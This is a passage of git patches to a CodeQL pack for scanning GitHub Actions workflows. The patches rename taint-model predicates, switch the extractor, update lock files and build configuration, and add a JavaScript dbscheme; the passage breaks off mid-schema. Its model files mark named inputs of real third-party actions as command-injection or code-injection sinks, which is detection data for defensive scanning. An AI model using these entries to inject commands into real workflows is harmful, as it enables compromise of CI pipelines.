a/ql/lib/ext/shallwefootball_upload-s3-action.model.yml +++ b/ql/lib/ext/shallwefootball_upload-s3-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["shallwefootball/upload-s3-action", "*", "input.destination_dir", "output.object_key", "taint", "manual"] diff --git a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml index 90a181038680..9058c9fb984c 100644 --- a/ql/lib/ext/shogo82148_actions-setup-perl.model.yml +++ b/ql/lib/ext/shogo82148_actions-setup-perl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["shogo82148/actions-setup-perl", "*", "input.working-directory", "env.PERL5LIB", "taint", "manual"] diff --git a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml index fd484074f5c5..713c5c61cea7 100644 --- a/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml +++ b/ql/lib/ext/skitionek_notify-microsoft-teams.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["skitionek/notify-microsoft-teams", "*", "input.overwrite", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/snow-actions_eclint.model.yml b/ql/lib/ext/snow-actions_eclint.model.yml index 5caaea9562e1..40b02283152a 100644 --- a/ql/lib/ext/snow-actions_eclint.model.yml +++ b/ql/lib/ext/snow-actions_eclint.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["snow-actions/eclint", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/stackhawk_hawkscan-action.model.yml b/ql/lib/ext/stackhawk_hawkscan-action.model.yml index 9462b8d5bbd1..c08505f97477 100644 --- a/ql/lib/ext/stackhawk_hawkscan-action.model.yml +++ b/ql/lib/ext/stackhawk_hawkscan-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["stackhawk/hawkscan-action", "*", "input.workspace", "command-injection", "manual"] - ["stackhawk/hawkscan-action", "*", "input.apiKey", "command-injection", "manual"] diff --git a/ql/lib/ext/step-security_harden-runner.model.yml b/ql/lib/ext/step-security_harden-runner.model.yml index 9b01987e1f28..6305fd339604 100644 --- a/ql/lib/ext/step-security_harden-runner.model.yml +++ b/ql/lib/ext/step-security_harden-runner.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["step-security/harden-runner", "*", "input.allowed-endpoints", "command-injection", "manual"] diff --git a/ql/lib/ext/suisei-cn_actions-download-file.model.yml b/ql/lib/ext/suisei-cn_actions-download-file.model.yml index 10a3630ea0bd..739880968188 100644 --- a/ql/lib/ext/suisei-cn_actions-download-file.model.yml +++ b/ql/lib/ext/suisei-cn_actions-download-file.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["suisei-cn/actions-download-file", "*", "input.filename", "output.filename", "taint", "manual"] diff --git a/ql/lib/ext/tibdex_backport.model.yml b/ql/lib/ext/tibdex_backport.model.yml index aac20afddf56..ee9a0dbb32a6 100644 --- a/ql/lib/ext/tibdex_backport.model.yml +++ b/ql/lib/ext/tibdex_backport.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tibdex/backport", "*", "input.body_template", "code-injection", "manual"] - ["tibdex/backport", "*", "input.head_template", "code-injection", "manual"] diff --git a/ql/lib/ext/timheuer_base64-to-file.model.yml b/ql/lib/ext/timheuer_base64-to-file.model.yml index 8dcabd1650a6..f056cf5d8644 100644 --- a/ql/lib/ext/timheuer_base64-to-file.model.yml +++ b/ql/lib/ext/timheuer_base64-to-file.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["timheuer/base64-to-file", "*", "input.fileName", "output.filePath", "taint", "manual"] - ["timheuer/base64-to-file", "*", "input.fileDir", "output.filePath", "taint", "manual"] diff --git a/ql/lib/ext/tj-actions_branch-names.model.yml b/ql/lib/ext/tj-actions_branch-names.model.yml index d98eda4e69f8..838f0b308487 100644 --- a/ql/lib/ext/tj-actions_branch-names.model.yml +++ b/ql/lib/ext/tj-actions_branch-names.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: # https://github.com/tj-actions/branch-names - ["tj-actions/branch-names", "*", "output.current_branch", "branch", "manual"] diff --git a/ql/lib/ext/trilom_file-changes-action.model.yml b/ql/lib/ext/trilom_file-changes-action.model.yml index b8fb2514253c..c215755f61dd 100644 --- a/ql/lib/ext/trilom_file-changes-action.model.yml +++ b/ql/lib/ext/trilom_file-changes-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["trilom/file-changes-action", "*", "output.files", "filename", "manual"] - ["trilom/file-changes-action", "*", "output.files_added", "filename", "manual"] diff --git a/ql/lib/ext/tripss_conventional-changelog-action.model.yml b/ql/lib/ext/tripss_conventional-changelog-action.model.yml index ae166b1f5154..014e779b29a0 100644 --- a/ql/lib/ext/tripss_conventional-changelog-action.model.yml +++ b/ql/lib/ext/tripss_conventional-changelog-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tripss/conventional-changelog-action", "*", "input.pre-release-identifier", "command-injection", "manual"] - ["tripss/conventional-changelog-action", "*", "input.git-user-name", "command-injection", "manual"] diff --git a/ql/lib/ext/tryghost_action-deploy-theme.model.yml b/ql/lib/ext/tryghost_action-deploy-theme.model.yml index a6cc68843895..806c055529df 100644 --- a/ql/lib/ext/tryghost_action-deploy-theme.model.yml +++ b/ql/lib/ext/tryghost_action-deploy-theme.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tryghost/action-deploy-theme", "*", "input.theme-name", "command-injection", "manual"] - ["tryghost/action-deploy-theme", "*", "input.exclude", "command-injection", "manual"] diff --git a/ql/lib/ext/tzkhan_pr-update-action.model.yml b/ql/lib/ext/tzkhan_pr-update-action.model.yml index 499161aafcb3..d6e554a87092 100644 --- a/ql/lib/ext/tzkhan_pr-update-action.model.yml +++ b/ql/lib/ext/tzkhan_pr-update-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["tzkhan/pr-update-action", "*", "output.headMatch", "branch", "manual"] diff --git a/ql/lib/ext/veracode_veracode-sca.model.yml b/ql/lib/ext/veracode_veracode-sca.model.yml index a352d6c9ff61..55d1531a7707 100644 --- a/ql/lib/ext/veracode_veracode-sca.model.yml +++ b/ql/lib/ext/veracode_veracode-sca.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["veracode/veracode-sca", "*", "input.url", "command-injection", "manual"] - ["veracode/veracode-sca", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/wearerequired_lint-action.model.yml b/ql/lib/ext/wearerequired_lint-action.model.yml index 6ed71f182151..c52d62e204a4 100644 --- a/ql/lib/ext/wearerequired_lint-action.model.yml +++ b/ql/lib/ext/wearerequired_lint-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wearerequired/lint-action", "*", "input.git_name", "command-injection", "manual"] - ["wearerequired/lint-action", "*", "input.git_email", "command-injection", "manual"] diff --git a/ql/lib/ext/webfactory_ssh-agent.model.yml b/ql/lib/ext/webfactory_ssh-agent.model.yml index 5864c0d0ede0..1e915194d96e 100644 --- a/ql/lib/ext/webfactory_ssh-agent.model.yml +++ b/ql/lib/ext/webfactory_ssh-agent.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["webfactory/ssh-agent", "*", "input.ssh-agent-cmd", "command-injection", "manual"] - ["webfactory/ssh-agent", "*", "input.ssh-add-cmd", "command-injection", "manual"] diff --git a/ql/lib/ext/xt0rted_slash-command-action.model.yml b/ql/lib/ext/xt0rted_slash-command-action.model.yml index 173ecfc4222f..1cc360c472d2 100644 --- a/ql/lib/ext/xt0rted_slash-command-action.model.yml +++ b/ql/lib/ext/xt0rted_slash-command-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] - ["xt0rted/slash-command-action", "*", "output.command-arguments", "text", "manual"] diff --git a/ql/lib/ext/zaproxy_action-baseline.model.yml b/ql/lib/ext/zaproxy_action-baseline.model.yml index 880b0d606da2..cb7e0936cca1 100644 --- a/ql/lib/ext/zaproxy_action-baseline.model.yml +++ b/ql/lib/ext/zaproxy_action-baseline.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zaproxy/action-baseline", "*", "input.docker_name", "command-injection", "manual"] - ["zaproxy/action-baseline", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/ext/zaproxy_action-full-scan.model.yml b/ql/lib/ext/zaproxy_action-full-scan.model.yml index fd8172c6ca84..210c3365eda9 100644 --- a/ql/lib/ext/zaproxy_action-full-scan.model.yml +++ b/ql/lib/ext/zaproxy_action-full-scan.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zaproxy/action-full-scan", "*", "input.docker_name", "command-injection", "manual"] - ["zaproxy/action-full-scan", "*", "input.target", "command-injection", "manual"] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5cfa47a5cdf6..89f8511812b4 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,14 +4,13 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.36 dependencies: + codeql/javascript-all: ^1.0.0 codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 codeql/controlflow: ^1.0.0 codeql/dataflow: ^1.0.0 -dbscheme: yaml.dbscheme -extractor: yaml -groups: - - yaml +extractor: javascript +groups: javascript dataExtensions: - ext/*.model.yml - ext/**/*.model.yml diff --git a/ql/lib/yaml.dbscheme b/ql/lib/yaml.dbscheme deleted file mode 100644 index 20d83c71ee67..000000000000 --- a/ql/lib/yaml.dbscheme +++ /dev/null @@ -1,80 +0,0 @@ -/*- YAML -*/ - -#keyset[parent, idx] -yaml (unique int id: @yaml_node, - int kind: int ref, - int parent: @yaml_node_parent ref, - int idx: int ref, - string tag: string ref, - string tostring: string ref); - -case @yaml_node.kind of - 0 = @yaml_scalar_node -| 1 = @yaml_mapping_node -| 2 = @yaml_sequence_node -| 3 = @yaml_alias_node -; - -@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; - -@yaml_node_parent = @yaml_collection_node | @file; - -yaml_anchors (unique int node: @yaml_node ref, - string anchor: string ref); - -yaml_aliases (unique int alias: @yaml_alias_node ref, - string target: string ref); - -yaml_scalars (unique int scalar: @yaml_scalar_node ref, - int style: int ref, - string value: string ref); - -yaml_errors (unique int id: @yaml_error, - string message: string ref); - -yaml_locations(unique int locatable: @yaml_locatable ref, - int location: @location_default ref); - -@yaml_locatable = @yaml_node | @yaml_error; - -/*- Files and folders -*/ - -/** - * The location of an element. - * The location spans column `startcolumn` of line `startline` to - * column `endcolumn` of line `endline` in file `file`. - * For more information, see - * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). - */ -locations_default( - unique int id: @location_default, - int file: @file ref, - int beginLine: int ref, - int beginColumn: int ref, - int endLine: int ref, - int endColumn: int ref -); - -files( - unique int id: @file, - string name: string ref -); - -folders( - unique int id: @folder, - string name: string ref -); - -@container = @file | @folder - -containerparent( - int parent: @container ref, - unique int child: @container ref -); - -/*- Source location prefix -*/ - -/** - * The source location of the snapshot. - */ -sourceLocationPrefix(string prefix : string ref); diff --git a/ql/lib/yaml.dbscheme.stats b/ql/lib/yaml.dbscheme.stats deleted file mode 100644 index 1c35ae984020..000000000000 --- a/ql/lib/yaml.dbscheme.stats +++ /dev/null @@ -1,4 +0,0 @@ - - - - \ No newline at end of file diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 4b8239b7f6ca..8110845ea1f9 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -7,6 +7,12 @@ dependencies: version: 1.0.0 codeql/ssa: version: 1.0.0 + codeql/javascript-all: + version: 1.0.0 + codeql/regex: + version: 1.0.0 + codeql/tutorial: + version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 65bb672183fe..669a8f88186e 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -6,8 +6,9 @@ groups: - actions - queries suites: codeql-suites -extractor: yaml +extractor: javascript defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: + codeql/javascript-all: ^1.0.0 githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 4b8239b7f6ca..8110845ea1f9 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -7,6 +7,12 @@ dependencies: version: 1.0.0 codeql/ssa: version: 1.0.0 + codeql/javascript-all: + version: 1.0.0 + codeql/regex: + version: 1.0.0 + codeql/tutorial: + version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index e3304b4fe72b..80ebd80b4c2b 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -50,13 +50,13 @@ query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = query predicate scopes(Cfg::CfgScope c) { any() } query predicate sources(string action, string version, string output, string kind, string provenance) { - sourceModel(action, version, output, kind, provenance) + actionsSourceModel(action, version, output, kind, provenance) } query predicate summaries( string action, string version, string input, string output, string kind, string provenance ) { - summaryModel(action, version, input, output, kind, provenance) + actionsSummaryModel(action, version, input, output, kind, provenance) } query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } diff --git a/ql/test/qlpack.yml b/ql/test/qlpack.yml index d85fc698394d..1676d742d37e 100644 --- a/ql/test/qlpack.yml +++ b/ql/test/qlpack.yml @@ -1,12 +1,10 @@ --- name: githubsecuritylab/actions-tests -groups: - - actions - - test +groups: [javascript, test] dependencies: githubsecuritylab/actions-all: ${workspace} githubsecuritylab/actions-queries: ${workspace} -extractor: yaml +extractor: javascript tests: . warnOnImplicitThis: true From df3d6131a8f754cec6514f5d715b75a33158efbd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 08:50:49 +0200 Subject: [PATCH 328/707] Update lock files --- ql/lib/codeql-pack.lock.yml | 2 ++ ql/src/codeql-pack.lock.yml | 8 ++++++-- ql/src/qlpack.yml | 4 +--- ql/test/codeql-pack.lock.yml | 8 ++++++-- 4 files changed, 15 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index c50889c18858..82795df00063 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -1,6 +1,8 @@ --- lockVersion: 1.0.0 dependencies: + codeql/controlflow: + version: 1.0.0 codeql/dataflow: version: 1.0.0 codeql/javascript-all: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 8110845ea1f9..82795df00063 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -5,18 +5,22 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/ssa: - version: 1.0.0 codeql/javascript-all: version: 1.0.0 + codeql/mad: + version: 1.0.0 codeql/regex: version: 1.0.0 + codeql/ssa: + version: 1.0.0 codeql/tutorial: version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 + codeql/xml: + version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 669a8f88186e..17e451718c5b 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -2,9 +2,7 @@ library: false name: githubsecuritylab/actions-queries version: 0.0.36 -groups: - - actions - - queries +groups: [actions, queries] suites: codeql-suites extractor: javascript defaultSuiteFile: codeql-suites/actions-code-scanning.qls diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 8110845ea1f9..82795df00063 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -5,18 +5,22 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/ssa: - version: 1.0.0 codeql/javascript-all: version: 1.0.0 + codeql/mad: + version: 1.0.0 codeql/regex: version: 1.0.0 + codeql/ssa: + version: 1.0.0 codeql/tutorial: version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 + codeql/xml: + version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false From e2fb677abb6df7e47cb3f0e2d7f56ea5fabd950f Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 09:48:27 +0200 Subject: [PATCH 329/707] Remove DS_Store --- .!79690!.DS_Store | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 .!79690!.DS_Store diff --git a/.!79690!.DS_Store b/.!79690!.DS_Store deleted file mode 100644 index e69de29bb2d1..000000000000 From e5eb85695dadf607ec0f31deeb7a93bc556912ae Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 10:04:50 +0200 Subject: [PATCH 330/707] Update action to use javascript extractor --- .github/action/dist/index.js | 10 +++++----- .github/action/src/codeql.ts | 2 +- .github/action/src/index.ts | 8 ++++---- 3 files changed, 10 insertions(+), 10 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 8ff1e7759d27..7bb3039fe486 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28604,7 +28604,7 @@ const toolcache = __importStar(__nccwpck_require__(7784)); const toolrunner = __importStar(__nccwpck_require__(8159)); async function newCodeQL() { return { - language: "yaml", + language: "javascript", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, @@ -28771,16 +28771,16 @@ async function run() { var codeql = await cql.newCodeQL(); core.debug(`CodeQL CLI found at '${codeql.path}'`); await cql.runCommand(codeql, ["version", "--format", "terse"]); - // check yaml support + // check javascript support var languages = await cql.runCommandJson(codeql, [ "resolve", "languages", "--format", "json", ]); - if (!languages.hasOwnProperty("yaml")) { - core.setFailed("CodeQL Yaml extractor not installed"); - throw new Error("CodeQL Yaml extractor not installed"); + if (!languages.hasOwnProperty("javascript")) { + core.setFailed("CodeQL javascript extractor not installed"); + throw new Error("CodeQL javascript extractor not installed"); } // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 76eacd6eb67e..08c4b420a4ca 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -24,7 +24,7 @@ export interface CodeQLConfig { export async function newCodeQL(): Promise { return { - language: "yaml", + language: "javascript", path: await findCodeQL(), pack: "githubsecuritylab/actions-queries", suite: `codeql-suites/${core.getInput("suite") || "actions-code-scanning"}.qls`, diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index b1a4fc80c644..53a484ae6c18 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -15,7 +15,7 @@ export async function run(): Promise { await cql.runCommand(codeql, ["version", "--format", "terse"]); - // check yaml support + // check javascript support var languages = await cql.runCommandJson(codeql, [ "resolve", "languages", @@ -23,9 +23,9 @@ export async function run(): Promise { "json", ]); - if (!languages.hasOwnProperty("yaml")) { - core.setFailed("CodeQL Yaml extractor not installed"); - throw new Error("CodeQL Yaml extractor not installed"); + if (!languages.hasOwnProperty("javascript")) { + core.setFailed("CodeQL javascript extractor not installed"); + throw new Error("CodeQL javascript extractor not installed"); } // download pack From f068504c4f50710ae88d4bfed562b728538ac2f4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 10:07:36 +0200 Subject: [PATCH 331/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 89f8511812b4..51347aa2c3b9 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.36 +version: 0.1.0 dependencies: codeql/javascript-all: ^1.0.0 codeql/util: ^1.0.0 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 17e451718c5b..e8c5259e9b8c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.36 +version: 0.1.0 groups: [actions, queries] suites: codeql-suites extractor: javascript From f8dd493a684f58f816d883276132547409ae068c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 11:15:17 +0200 Subject: [PATCH 332/707] Update build.yml --- .github/workflows/build.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 78fec3b00eb5..8ba664564b40 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -25,4 +25,6 @@ jobs: - name: Run action if: steps.changes.outputs.src == 'true' + env: + GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} uses: ./ From c61e71f22d3faeb4ad118688a553bbf4104b2264 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 12 Jun 2024 11:19:06 +0200 Subject: [PATCH 333/707] Update build.yml --- .github/workflows/build.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/build.yml b/.github/workflows/build.yml index 8ba664564b40..9bc5b787feac 100644 --- a/.github/workflows/build.yml +++ b/.github/workflows/build.yml @@ -25,6 +25,6 @@ jobs: - name: Run action if: steps.changes.outputs.src == 'true' - env: - GITHUB_TOKEN: ${{ secrets.GHCR_TOKEN }} uses: ./ + with: + token: ${{ secrets.GHCR_TOKEN }} From fbaf329428eb998999d8aaa6935852490df15982 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 13 Jun 2024 11:50:28 +0200 Subject: [PATCH 334/707] Remove dependencies with javascript-all --- ql/lib/codeql-pack.lock.yml | 10 - ql/lib/qlpack.yml | 1 - ql/src/codeql-pack.lock.yml | 10 - ql/src/qlpack.yml | 2 +- ql/src/semmlecode.javascript.dbscheme | 1190 + ql/src/semmlecode.javascript.dbscheme.stats | 28248 ++++++++++++++++++ ql/test/codeql-pack.lock.yml | 10 - 7 files changed, 29439 insertions(+), 32 deletions(-) create mode 100644 ql/src/semmlecode.javascript.dbscheme create mode 100644 ql/src/semmlecode.javascript.dbscheme.stats diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 82795df00063..4b8239b7f6ca 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -5,22 +5,12 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/javascript-all: - version: 1.0.0 - codeql/mad: - version: 1.0.0 - codeql/regex: - version: 1.0.0 codeql/ssa: version: 1.0.0 - codeql/tutorial: - version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 - codeql/xml: - version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 51347aa2c3b9..6a247cee330f 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,7 +4,6 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.1.0 dependencies: - codeql/javascript-all: ^1.0.0 codeql/util: ^1.0.0 codeql/yaml: ^1.0.0 codeql/controlflow: ^1.0.0 diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 82795df00063..4b8239b7f6ca 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -5,22 +5,12 @@ dependencies: version: 1.0.0 codeql/dataflow: version: 1.0.0 - codeql/javascript-all: - version: 1.0.0 - codeql/mad: - version: 1.0.0 - codeql/regex: - version: 1.0.0 codeql/ssa: version: 1.0.0 - codeql/tutorial: - version: 1.0.0 codeql/typetracking: version: 1.0.0 codeql/util: version: 1.0.0 - codeql/xml: - version: 1.0.0 codeql/yaml: version: 1.0.0 compiled: false diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e8c5259e9b8c..05f3408c578d 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -5,8 +5,8 @@ version: 0.1.0 groups: [actions, queries] suites: codeql-suites extractor: javascript +dbscheme: semmlecode.javascript.dbscheme defaultSuiteFile: codeql-suites/actions-code-scanning.qls dependencies: - codeql/javascript-all: ^1.0.0 githubsecuritylab/actions-all: ${workspace} warnOnImplicitThis: true diff --git a/ql/src/semmlecode.javascript.dbscheme b/ql/src/semmlecode.javascript.dbscheme new file mode 100644 index 000000000000..c88c69174bd0 --- /dev/null +++ b/ql/src/semmlecode.javascript.dbscheme @@ -0,0 +1,1190 @@ +/*** Standard fragments ***/ + +/*- Files and folders -*/ + +/** + * The location of an element. + * The location spans column `startcolumn` of line `startline` to + * column `endcolumn` of line `endline` in file `file`. + * For more information, see + * [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). + */ +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref +); + +files( + unique int id: @file, + string name: string ref +); + +folders( + unique int id: @folder, + string name: string ref +); + +@container = @file | @folder + +containerparent( + int parent: @container ref, + unique int child: @container ref +); + +/*- Lines of code -*/ + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref +); + +/*- External data -*/ + +/** + * External data, loaded from CSV files during snapshot creation. See + * [Tutorial: Incorporating external data](https://help.semmle.com/wiki/display/SD/Tutorial%3A+Incorporating+external+data) + * for more information. + */ +externalData( + int id : @externalDataElement, + string path : string ref, + int column: int ref, + string value : string ref +); + +/*- Source location prefix -*/ + +/** + * The source location of the snapshot. + */ +sourceLocationPrefix(string prefix : string ref); + +/*- JavaScript-specific part -*/ + +@location = @location_default + +@sourceline = @locatable; + +filetype( + int file: @file ref, + string filetype: string ref +) + +// top-level code fragments +toplevels (unique int id: @toplevel, + int kind: int ref); + +is_externs (int toplevel: @toplevel ref); + +case @toplevel.kind of + 0 = @script +| 1 = @inline_script +| 2 = @event_handler +| 3 = @javascript_url +| 4 = @template_toplevel; + +is_module (int tl: @toplevel ref); +is_nodejs (int tl: @toplevel ref); +is_es2015_module (int tl: @toplevel ref); +is_closure_module (int tl: @toplevel ref); + +@xml_node_with_code = @xmlelement | @xmlattribute | @template_placeholder_tag; +toplevel_parent_xml_node( + unique int toplevel: @toplevel ref, + int xmlnode: @xml_node_with_code ref); + +xml_element_parent_expression( + unique int xmlnode: @xmlelement ref, + int expression: @expr ref, + int index: int ref); + +// statements +#keyset[parent, idx] +stmts (unique int id: @stmt, + int kind: int ref, + int parent: @stmt_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +stmt_containers (unique int stmt: @stmt ref, + int container: @stmt_container ref); + +jump_targets (unique int jump: @stmt ref, + int target: @stmt ref); + +@stmt_parent = @stmt | @toplevel | @function_expr | @arrow_function_expr | @static_initializer; +@stmt_container = @toplevel | @function | @namespace_declaration | @external_module_declaration | @global_augmentation_declaration; + +case @stmt.kind of + 0 = @empty_stmt +| 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @labeled_stmt +| 5 = @break_stmt +| 6 = @continue_stmt +| 7 = @with_stmt +| 8 